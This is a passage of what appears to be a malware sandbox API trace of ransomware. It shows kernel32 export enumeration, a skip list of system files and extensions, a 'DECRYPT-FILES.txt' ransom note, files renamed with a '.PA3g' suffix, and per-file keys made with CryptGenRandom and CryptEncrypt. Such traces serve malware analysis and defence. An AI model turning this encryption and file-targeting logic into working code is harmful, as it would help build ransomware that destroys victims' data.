lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.962] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.962] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.962] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.962] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.962] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.963] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.963] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.963] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.963] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.963] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.963] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.963] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.963] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.963] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.963] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.963] lstrlenA (lpString="DELETEATOM") returned 10 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.963] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.963] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.963] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.963] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.963] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.963] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.963] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.963] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.963] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.964] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.964] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.964] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.964] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.964] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.964] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.964] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.964] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.964] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.964] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.964] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.964] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.964] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.964] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.964] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.964] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.964] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.964] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.964] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.965] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.965] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.965] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.965] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.965] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.965] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.965] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.965] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.965] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.965] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.965] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.965] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.965] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.965] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.965] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.965] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.966] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi") returned 50 [0082.966] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi.PA3g") returned 55 [0082.966] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c99dhx1l.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi.PA3g" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c99dhx1l.avi.pa3g"), dwFlags=0x0) returned 1 [0082.966] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.966] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.967] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.967] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8dcce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0082.967] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0082.967] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0082.967] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0082.967] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0082.967] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0082.967] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0082.967] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861156d0, ftCreationTime.dwHighDateTime=0x1d4d063, ftLastAccessTime.dwLowDateTime=0xfbc827a0, ftLastAccessTime.dwHighDateTime=0x1d4ca50, ftLastWriteTime.dwLowDateTime=0xfbc827a0, ftLastWriteTime.dwHighDateTime=0x1d4ca50, nFileSizeHigh=0x0, nFileSizeLow=0xdc04, dwReserved0=0x0, dwReserved1=0x0, cFileName="emb1rMdXZCT.m4a", cAlternateFileName="EMB1RM~1.M4A")) returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="autorun.inf") returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="boot.ini") returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="desktop.ini") returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="ntuser.dat") returned -1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="iconcache.db") returned -1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="bootsect.bak") returned 1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="ntuser.dat.log") returned -1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="thumbs.db") returned -1 [0082.967] lstrcmpiW (lpString1="emb1rMdXZCT.m4a", lpString2="Bootfont.bin") returned 1 [0082.967] lstrlenW (lpString="emb1rMdXZCT.m4a") returned 15 [0082.967] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0082.967] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0082.967] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0082.967] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0082.968] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.968] lstrlenW (lpString="emb1rMdXZCT.m4a") returned 15 [0082.968] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.968] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="emb1rMdXZCT.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a" [0082.968] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\emb1rmdxzct.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.968] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=56324) returned 1 [0082.968] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.968] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.968] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.968] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.968] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.969] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.969] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.970] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.970] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.971] CloseHandle (hObject=0x43c) returned 1 [0082.971] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.971] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.972] CloseHandle (hObject=0x0) returned 0 [0082.972] CloseHandle (hObject=0x438) returned 1 [0082.972] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.972] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.972] GetTickCount () returned 0x114d366 [0082.972] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.972] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.973] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.974] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.974] lstrlenA (lpString="kernel32.dll") returned 12 [0082.974] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.974] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.974] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.974] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.974] lstrlenA (lpString="ADDATOMA") returned 8 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.974] lstrlenA (lpString="ADDATOMW") returned 8 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.974] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.974] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.974] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.974] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.974] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.975] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.975] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.975] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.975] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.975] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.975] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.975] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.975] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.975] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.975] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.975] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.975] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.975] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.975] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.975] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.975] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.975] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.975] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.975] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.976] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.976] 